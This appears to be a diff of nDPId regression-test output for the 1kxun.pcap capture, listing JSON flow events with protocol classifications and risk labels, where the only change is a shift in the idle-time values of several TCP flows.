00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104429964,"flow_last_seen":1470104430065,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00933{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00933{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104420438,"flow_last_seen":1470104420540,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1470104397807,"flow_last_seen":1470104414604,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":959,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
@@ -596,7 +596,7 @@ 00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":180000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":465,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381217,"flow_last_seen":1470104381626,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00932{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00932{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382038,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382036,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
@@ -607,31 +607,31 @@ 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104411327,"flow_last_seen":1470104411735,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104377634,"flow_last_seen":1470104415729,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1096,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399959,"flow_last_seen":1470104400366,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104403134,"flow_last_seen":1470104403234,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391361,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416959,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416958,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 